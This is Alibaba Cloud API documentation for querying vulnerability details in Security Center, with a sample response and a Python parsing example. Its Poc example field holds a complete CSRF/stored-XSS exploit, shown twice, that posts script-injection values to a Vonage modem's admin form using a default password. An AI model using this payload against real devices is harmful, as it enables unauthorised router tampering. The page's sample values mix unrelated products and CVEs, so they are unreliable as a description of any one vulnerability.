
Security Center:DescribeVulDetails

Last Updated: Feb 20, 2024

Queries the details about a vulnerability.

Debugging

OpenAPI Explorer automatically calculates the signature value. For your convenience, we recommend that you call this operation in OpenAPI Explorer.

Authorization information

The following table shows the authorization information for this API operation. Use it in the Action element of a policy to grant a RAM user or RAM role the permissions to call this API operation. The columns are:

  • Operation: the value that you can use in the Action element to specify the operation on a resource.
  • Access level: the access level of each operation. The levels are read, write, and list.
  • Resource type: the type of the resource on which you can authorize the RAM user or the RAM role to perform the operation. Take note of the following items:
    • The required resource types are displayed in bold characters.
    • If the permissions cannot be granted at the resource level, All Resources is used in the Resource type column of the operation.
  • Condition Key: the condition key that is defined by the cloud service.
  • Associated operation: other operations that the RAM user or the RAM role must have permissions to perform to complete the operation.

Operation | Access level | Resource type | Condition key | Associated operation
yundun-sas:DescribeVulDetails | Read | All Resources (*) | none | none

Request parameters

Each entry gives the parameter name, its type and whether it is required, followed by the description and an example value.

Lang (string, required)

The language of the content within the request and response. Valid values:

  • zh: Chinese
  • en: English

Example: zh

Type (string, required)

The type of the vulnerability. Valid values:

  • cve: Linux software vulnerability
  • sys: Windows system vulnerability
  • cms: Web-CMS vulnerability
  • app: application vulnerability
  • emg: urgent vulnerability
  • sca: vulnerability that is detected based on software component analysis

Example: sca

Name (string, required)

The name of the vulnerability.

Note: You can call the DescribeGroupedVul or DescribeVulList operation to query the names of vulnerabilities.

Example: SCA:ACSV-2020-052801

AliasName (string, required)

The vulnerability announcement.

Example: RHSA-2019:3197-Important: sudo security update

ResourceDirectoryAccountId (long, optional)

The Alibaba Cloud account ID of the member in the resource directory.

Note: You can call the DescribeMonitorAccounts operation to obtain the IDs.

Example: 127608589417****

Response parameters

Each entry gives the parameter name and its type, followed by the description and an example value.

(object)

The response parameters.

RequestId (string)

The ID of the request, which is used to locate and troubleshoot issues.

Example: EDA40EA3-6265-5900-AD99-C83E4F109CA8

Cves (object [])

The details of the vulnerability.

Summary (string)

The introduction to the vulnerability.

Example: Chanjet T-Plus is an Internet business management software. There is an unauthorized access vulnerability in one of its interfaces disclosed on the Internet. Attackers can construct malicious requests to upload malicious files to execute arbitrary code and control the server.

Complexity (string)

The difficulty level of exploiting the vulnerability. Valid values:

  • LOW
  • MEDIUM
  • HIGH

Example: LOW

Product (string)

The service that is affected by the vulnerability.

Example: Log4j2

PocCreateTime (long)

The UNIX timestamp when the proof of concept (POC) was created. Unit: milliseconds.

Example: 1554189334000

CveId (string)

The Common Vulnerabilities and Exposures (CVE) ID.

Example: CVE-2019-9167

CnvdId (string)

The China National Vulnerability Database (CNVD) ID.

Example: CNVD-2019-9167

Reference (string)

The reference of the vulnerability in the Alibaba Cloud vulnerability library. The value is a URL.

Example: https://example.com

CvssScore (string)

The Common Vulnerability Scoring System (CVSS) score of the vulnerability in the Alibaba Cloud vulnerability library.

Example: 10.0

Vendor (string)

The vendor that disclosed the vulnerability.

Example: Apache

PocDisclosureTime (long)

The UNIX timestamp when the POC was disclosed. Unit: milliseconds.

Example: 1554189334000

Classify (string)

The type of the vulnerability.

Example: remote_code_execution

CvssVector (string)

The vector that is used to calculate the CVSS score.

Example: AV:N/AC:L/Au:N/C:C/I:C/A:C

VulLevel (string)

The severity of the vulnerability. Valid values:

  • serious
  • high
  • medium
  • low

Example: serious

ReleaseTime (long)

The disclosure time that is displayed for the vulnerability in the Alibaba Cloud vulnerability library. The value is a UNIX timestamp. Unit: milliseconds.

Example: 1554189334000

Title (string)

The title of the vulnerability announcement.

Example: Chanjet T-Plus SetupAccount/Upload. Aspx file upload vulnerability(CNVD-2022-60632)

Solution (string)

The suggested fix for the vulnerability.

Example:
<p>At present, Chanjet has urgently released a vulnerability patch to fix the vulnerability. CNVD recommends affected units and users to upgrade to the latest version immediately:</p>↵<p>https://www.chanjetvip.com/product/goods/goods-detail?id=53aaa40295d458e44f5d3ce5</p>↵<p>At the same time, organizations and users affected by the vulnerability are requested to immediately follow the steps below to conduct self-inspection and repair work:</p>↵<ol>↵<li><p>User self-check steps:↵<br />Check whether website/bin/load.aspx.cdcab7d2.compiled, website/bin/App_Web_load.aspx.cdcab7d2.dll, and tplus/Load.aspx files exist locally. If they exist, it means that they have been poisoned, and you must reinstall the system and install the product. patch.</p>↵</li>↵<li><p>Non-poisoned users please:↵<br />1) Update the latest product patch.↵<br />2) Install anti-virus software and update the virus database in time.↵<br />3) Upgrade the lower version of IIS and Nginx to IIS10.0 and Windows 2016.↵<br />4) Local installation customers need to confirm whether the backup file is complete as soon as possible, and do off-site backup. Customers on the cloud should enable the mirroring function in time.↵<br />5) Users who fail to update the patch in time can contact Chanjet technical support and take temporary preventive measures such as deleting files.</p>↵</li>↵<li><p>Poisoned users please:↵<br />1) Check whether the server has taken regular snapshots or backups. If so, you can restore data through snapshots or backups.↵<br />2) Contact Chanjet technical support to confirm whether it has the conditions and operation methods to restore data from backup files.</p>↵</li>↵</ol>↵<p>If you have any technical problems, please contact Chanjet technical support: 4006600566-9</p>

Content (string)

The CVE content.

Example:
Apache Shiro is a user authentication and authorization framework for a wide range of rights management applications.↵Recently, Apache Shiro released version 1.7.0, which fixes the Apache Shiro authentication bypass vulnerability (CVE-2020-17510).↵Attackers can bypass Shiro's authentication using malicious requests containing payloads.↵↵Related bugs:↵CVE-2020-17510 Shiro < 1.7.0 Validation Bypass Vulnerability↵CVE-2020-13933 Shiro < 1.6.0 Validation Bypass Vulnerability↵CVE-2020-11989 Shiro < 1.5.3 Validation Bypass Vulnerability↵CVE-2020-1957 Shiro < 1.5.2 Validation Bypass Vulnerability↵CVE-2016-6802 Shiro < 1.3.2 Validation Bypass Vulnerability Check whether the fastjson version currently running on the system is in the affected version and whether safeMode is configured to disable autoType. If it is in the affected version and safeMode is not configured to disable autoType, the vulnerability is considered to exist.

Poc (string)

The POC content.

Example:
NewDomain.html The x and y values will need to be changed accordingly <html> <p>Authenticated Stored CSRF/XSS - Vonage Modem</p> <form method="POST" action="http://192.168.15.1/goform/RgParentalBasic"> <input type="hidden" name="RemoveContentRule" value="0" /> <input type="hidden" name="AddContentRule" value="0" /> <input type="hidden" name="ContentRules" value="0" /> <input type="hidden" name="RuleSelect" value="0" / > <input type="hidden" name="NewKeyword" value="" / > <input type="hidden" name="KeywordAction" value="0" /> <input type="hidden" name="NewDomain" value="test'><script>alert(1)</script>" /> <input type="hidden" name="x" value="50" /> <input type="hidden" name="y" value="15" /> <input type="hidden" name="DomainAction" value="1" /> <input type="hidden" name="AllowedDomainAction" value="0" /> <input type="hidden" name="ParentalPassword" value="Broadcom" /> <input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" /> <input type="hidden" name="AccessDuration" value="30" /> <input type="submit" title="Exploit" /> </form> </html> NewKeyword.html The x and y values will need to be changed accordingly <html> <p>Authenticated Stored CSRF/XSS - Vonage Modem</p> <form method="POST" action="http://192.168.15.1/goform/RgParentalBasic"> <input type="hidden" name="RemoveContentRule" value="0" /> <input type="hidden" name="AddContentRule" value="0" /> <input type="hidden" name="ContentRules" value="0" /> <input type="hidden" name="RuleSelect" value="0" / > <input type="hidden" name="NewKeyword" value="test'><script>alert(1)</script>" / > <input type="hidden" name="x" value="61" /> <input type="hidden" name="y" value="12" /> <input type="hidden" name="KeywordAction" value="1" /> <input type="hidden" name="NewDomain" value="" /> <input type="hidden" name="DomainAction" value="0" /> <input type="hidden" name="AllowedDomainAction" value="0" /> <input type="hidden" name="ParentalPassword" value="Broadcom" /> <input type="hidden" name="ParentalPasswordReEnter" 
value="Broadcom" /> <input type="hidden" name="AccessDuration" value="30" /> <input type="submit" title="Enable Service" /> </form> </html>

Classifys (object [])

The vulnerability types.

Description (string)

The description of the vulnerability type.

Example: Remote code execution

Classify (string)

The type of the vulnerability.

Example: remote_code_execution

DemoVideoUrl (string)

The URL of the demo video for the vulnerability.

Example: https://example.com

OtherId (string)

The ID of the vulnerability.

Example: CVE-2020-8597

InstanceName (string)

The name of the instance.

Note: This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.

Example: sql-test-001

InternetIp (string)

The public IP address of the server.

Note: This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.

Example: 47.114.XX.XX

IntranetIp (string)

The private IP address of the server.

Note: This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.

Example: 172.19.XX.XX

TargetId (string)

The ID of the asset that is scanned.

Note: This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.

Example: m-bp17m0pc0xprzbwo****

TargetName (string)

The name of the asset that is scanned.

Note: This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.

Example: frontend

Examples

Sample success responses

JSON format

{
  "RequestId": "EDA40EA3-6265-5900-AD99-C83E4F109CA8",
  "Cves": [
    {
      "Summary": "Chanjet T-Plus is an Internet business management software. There is an unauthorized access vulnerability in one of its interfaces disclosed on the Internet. Attackers can construct malicious requests to upload malicious files to execute arbitrary code and control the server.",
      "Complexity": "LOW",
      "Product": "Log4j2",
      "PocCreateTime": 1554189334000,
      "CveId": "CVE-2019-9167",
      "CnvdId": "CNVD-2019-9167",
      "Reference": "https://example.com",
      "CvssScore": "10.0",
      "Vendor": "Apache",
      "PocDisclosureTime": 1554189334000,
      "Classify": "remote_code_execution",
      "CvssVector": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
      "VulLevel": "serious",
      "ReleaseTime": 1554189334000,
      "Title": "Chanjet T-Plus SetupAccount/Upload. Aspx file upload vulnerability(CNVD-2022-60632)",
      "Solution": "<p>At present, Chanjet has urgently released a vulnerability patch to fix the vulnerability. CNVD recommends affected units and users to upgrade to the latest version immediately:</p>↵<p>https://www.chanjetvip.com/product/goods/goods-detail?id=53aaa40295d458e44f5d3ce5</p>↵<p>At the same time, organizations and users affected by the vulnerability are requested to immediately follow the steps below to conduct self-inspection and repair work:</p>↵<ol>↵<li><p>User self-check steps:↵<br  />Check whether website/bin/load.aspx.cdcab7d2.compiled, website/bin/App_Web_load.aspx.cdcab7d2.dll, and tplus/Load.aspx files exist locally. If they exist, it means that they have been poisoned, and you must reinstall the system and install the product. patch.</p>↵</li>↵<li><p>Non-poisoned users please:↵<br  />1) Update the latest product patch.↵<br  />2) Install anti-virus software and update the virus database in time.↵<br  />3) Upgrade the lower version of IIS and Nginx to IIS10.0 and Windows 2016.↵<br  />4) Local installation customers need to confirm whether the backup file is complete as soon as possible, and do off-site backup. Customers on the cloud should enable the mirroring function in time.↵<br  />5) Users who fail to update the patch in time can contact Chanjet technical support and take temporary preventive measures such as deleting files.</p>↵</li>↵<li><p>Poisoned users please:↵<br  />1) Check whether the server has taken regular snapshots or backups. If so, you can restore data through snapshots or backups.↵<br  />2) Contact Chanjet technical support to confirm whether it has the conditions and operation methods to restore data from backup files.</p>↵</li>↵</ol>↵<p>If you have any technical problems, please contact Chanjet technical support: 4006600566-9</p>",
      "Content": "Apache Shiro is a user authentication and authorization framework for a wide range of rights management applications.↵Recently, Apache Shiro released version 1.7.0, which fixes the Apache Shiro authentication bypass vulnerability (CVE-2020-17510).↵Attackers can bypass Shiro's authentication using malicious requests containing payloads.↵↵Related bugs:↵CVE-2020-17510 Shiro < 1.7.0 Validation Bypass Vulnerability↵CVE-2020-13933 Shiro < 1.6.0 Validation Bypass Vulnerability↵CVE-2020-11989 Shiro < 1.5.3 Validation Bypass Vulnerability↵CVE-2020-1957 Shiro < 1.5.2 Validation Bypass Vulnerability↵CVE-2016-6802 Shiro < 1.3.2 Validation Bypass Vulnerability\nCheck whether the fastjson version currently running on the system is in the affected version and whether safeMode is configured to disable autoType. If it is in the affected version and safeMode is not configured to disable autoType, the vulnerability is considered to exist.",
      "Poc": "NewDomain.html\nThe x and y values will need to be changed accordingly\n<html>\n<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>\n<form method=\"POST\" action=\"http://192.168.15.1/goform/RgParentalBasic\">\n<input type=\"hidden\" name=\"RemoveContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"AddContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"ContentRules\" value=\"0\" />\n<input type=\"hidden\" name=\"RuleSelect\" value=\"0\" / >\n<input type=\"hidden\" name=\"NewKeyword\" value=\"\" / >\n<input type=\"hidden\" name=\"KeywordAction\" value=\"0\" />\n<input type=\"hidden\" name=\"NewDomain\" value=\"test'><script>alert(1)</script>\" />\n<input type=\"hidden\" name=\"x\" value=\"50\" />\n<input type=\"hidden\" name=\"y\" value=\"15\" />\n<input type=\"hidden\" name=\"DomainAction\" value=\"1\" />\n<input type=\"hidden\" name=\"AllowedDomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"ParentalPassword\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"ParentalPasswordReEnter\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"AccessDuration\" value=\"30\" />\n<input type=\"submit\" title=\"Exploit\" />\n</form>\n</html>\n \nNewKeyword.html\nThe x and y values will need to be changed accordingly\n<html>\n<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>\n<form method=\"POST\" action=\"http://192.168.15.1/goform/RgParentalBasic\">\n<input type=\"hidden\" name=\"RemoveContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"AddContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"ContentRules\" value=\"0\" />\n<input type=\"hidden\" name=\"RuleSelect\" value=\"0\" / >\n<input type=\"hidden\" name=\"NewKeyword\" value=\"test'><script>alert(1)</script>\" / >\n<input type=\"hidden\" name=\"x\" value=\"61\" />\n<input type=\"hidden\" name=\"y\" value=\"12\" />\n<input type=\"hidden\" name=\"KeywordAction\" value=\"1\" />\n<input type=\"hidden\" name=\"NewDomain\" value=\"\" />\n<input type=\"hidden\" 
name=\"DomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"AllowedDomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"ParentalPassword\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"ParentalPasswordReEnter\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"AccessDuration\" value=\"30\" />\n<input type=\"submit\" title=\"Enable Service\" />\n</form>\n</html>",
      "Classifys": [
        {
          "Description": "Remote code execution\n",
          "Classify": "remote_code_execution",
          "DemoVideoUrl": "https://example.com"
        }
      ],
      "OtherId": "CVE-2020-8597",
      "InstanceName": "sql-test-001",
      "InternetIp": "47.114.XX.XX",
      "IntranetIp": "172.19.XX.XX",
      "TargetId": "m-bp17m0pc0xprzbwo****",
      "TargetName": "frontend",
      "CveLink": "https://avd.aliyun.com/detail/CVE-2022-1184"
    }
  ]
}
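
An added example (not part of the original page and not Alibaba Cloud SDK code) of how a client might normalize this response for triage: it converts the millisecond timestamps, expands the CVSS v2 vector, and handles the HTML-bearing Solution and Poc strings as untrusted text. The function names and the shortened SAMPLE are assumptions made for the illustration.

```python
import html
from datetime import datetime, timezone
from html.parser import HTMLParser

# CVSS v2 base metrics: the format of the CvssVector example on this page.
_CIA = {"N": "none", "P": "partial", "C": "complete"}
CVSS2 = {
    "AV": {"L": "local", "A": "adjacent_network", "N": "network"},
    "AC": {"H": "high", "M": "medium", "L": "low"},
    "Au": {"M": "multiple", "S": "single", "N": "none"},
    "C": _CIA, "I": _CIA, "A": _CIA,
}

def parse_cvss2(vector):
    """Expand a CVSS v2 base vector; raise ValueError for anything else."""
    parts = dict(p.split(":", 1) for p in vector.split("/") if ":" in p)
    if set(parts) != set(CVSS2) or any(v not in CVSS2[m] for m, v in parts.items()):
        raise ValueError(f"not a CVSS v2 base vector: {vector!r}")
    return {m: CVSS2[m][v] for m, v in parts.items()}

def ms_to_iso(ms):
    """Times in the response are UNIX timestamps in milliseconds."""
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc).isoformat()

def html_to_text(fragment):
    """Reduce an HTML-bearing field such as Solution to plain text."""
    chunks = []
    parser = HTMLParser()
    parser.handle_data = chunks.append  # collect text nodes, drop every tag
    parser.feed(fragment)
    parser.close()
    return " ".join(" ".join(chunks).split())

def normalize(response):
    """Flatten each Cves entry into a record for a ticket or dashboard."""
    records = []
    for cve in response.get("Cves", []):
        try:
            vector = parse_cvss2(cve.get("CvssVector", ""))
        except ValueError:
            vector = None  # keep the record; leave the vector for manual review
        records.append({
            "id": cve.get("CveId") or cve.get("OtherId"),
            "level": cve.get("VulLevel"),
            "score": float(cve["CvssScore"]),  # returned as a string
            "vector": vector,
            "released": ms_to_iso(cve["ReleaseTime"]),
            "solution": html_to_text(cve.get("Solution", "")),  # plain text
            "poc": html.escape(cve.get("Poc", "")),  # shown as text, never as markup
        })
    return records

# Constructed sample: field names and formats from this page, values shortened.
SAMPLE = {"RequestId": "EDA40EA3-6265-5900-AD99-C83E4F109CA8", "Cves": [{
    "CveId": "CVE-2019-9167", "VulLevel": "serious", "CvssScore": "10.0",
    "CvssVector": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "ReleaseTime": 1554189334000,
    "Solution": "<p>1) Update the latest product patch.</p>\n<br />2) Install anti-virus software.",
    "Poc": "<input name=\"NewDomain\" value=\"test'><script>alert(1)</script>\" />",
}]}
```

The solution field comes back as plain text, so escape it again before placing it in an HTML template.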

Error codes

HTTP status code | Error code | Error message | Description
400 | InnerError | InnerError | -
400 | DataExists | %s data exist | -
400 | RdCheckNoPermission | Resource directory account verification has no permission. | -
403 | NoPermission | caller has no permission | You are not authorized to do this operation.
500 | RdCheckInnerError | Resource directory account service internal error. | -
500 | ServerError | ServerError | -

For a list of error codes, see Service error codes.

Change history

2023-10-24: The error code has changed. The response structure of the API has changed.

  • Error Codes: The error code has changed.
    • delete Error Codes: 400
    • delete Error Codes: 500
  • Output Parameters: The response structure of the API has changed.

2023-08-07: The error code has changed. The response structure of the API has changed.

  • Error Codes: The error code has changed.
    • delete Error Codes: 400
    • delete Error Codes: 500
  • Output Parameters: The response structure of the API has changed.

2023-07-20: The error code has changed. The request parameters of the API have changed.

  • Error Codes: The error code has changed.
    • Error Codes 400 change
    • Added Error Codes: 500
  • Input Parameters: The request parameters of the API have changed.
    • Added Input Parameters: ResourceDirectoryAccountId

2023-03-16: The error code has changed.

  • Error Codes: The error code has changed.
    • delete Error Codes: 400